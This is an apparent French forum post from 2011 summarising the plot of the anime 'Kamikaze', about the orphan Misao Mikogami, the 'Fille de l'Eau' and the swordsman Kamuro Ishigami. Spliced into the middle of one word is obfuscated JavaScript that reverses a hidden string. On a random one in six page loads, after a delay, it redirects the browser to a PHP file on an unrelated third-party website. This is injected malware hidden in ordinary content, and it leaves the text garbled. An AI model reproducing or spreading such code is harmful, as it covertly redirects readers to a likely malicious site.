Kamikaze
Posté : 27 avr. 2011, 20:37
Tokyo, la station de métro Shin Ichigaya est le théâtre de ce drame planétaire. Des guerriers aux fabuleux pouvoirs partent à la recherche de la mystérieuse "Fille de l'Eau". Mais sur leur chemin, se dresse bientôt Kamuro Ishigami. Armé d'un katana magique baptisé Kamikaze, il réussit à défaire tous ses ennemis. Les deux partis finissent par réaliser que le plus important, dans l'immédiat, est de retrouver la "Fille de l'Eau" et ils décident d'un commun accord de cesser le combat. Leurs routes se croisent de nouveau devant l'école de la jeune Misao Mikogami.
Orpheline, elle vient d'être adoptée. Comme tous les enfants de son âge, elle est confrontée aux problèmes quotidiens des écoliers. Un jour, son amie Sakuraï et d'étranges individus qui l'appellent Aïguma font irruption dans l'établissement scolaire. Elle réalise alors qu'elle est la "Fille de l'Eau", descendante des cinq gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands de Kunitsu du peuple des Matsurowanu Kegainotami, les rebelles "non illuminés", et qu'elle a une mission à accomplir.
Encore une fois, Kamuro Ishigami intervient et réussit à repousser les assaillants. Plus tard, Misao raconte son aventure à son amie et journaliste Keiko Mase qui lui conseille de retourner à l'école. Mais d'autres intrus investissent bientôt les lieux, dévastant tout sur leur passage. Pour éviter un nouveau bain de sang, Misao décide de se rendre.
Elle découvre que les Kegainotami veulent se servir d'elle pour ressusciter les 88 bêtes.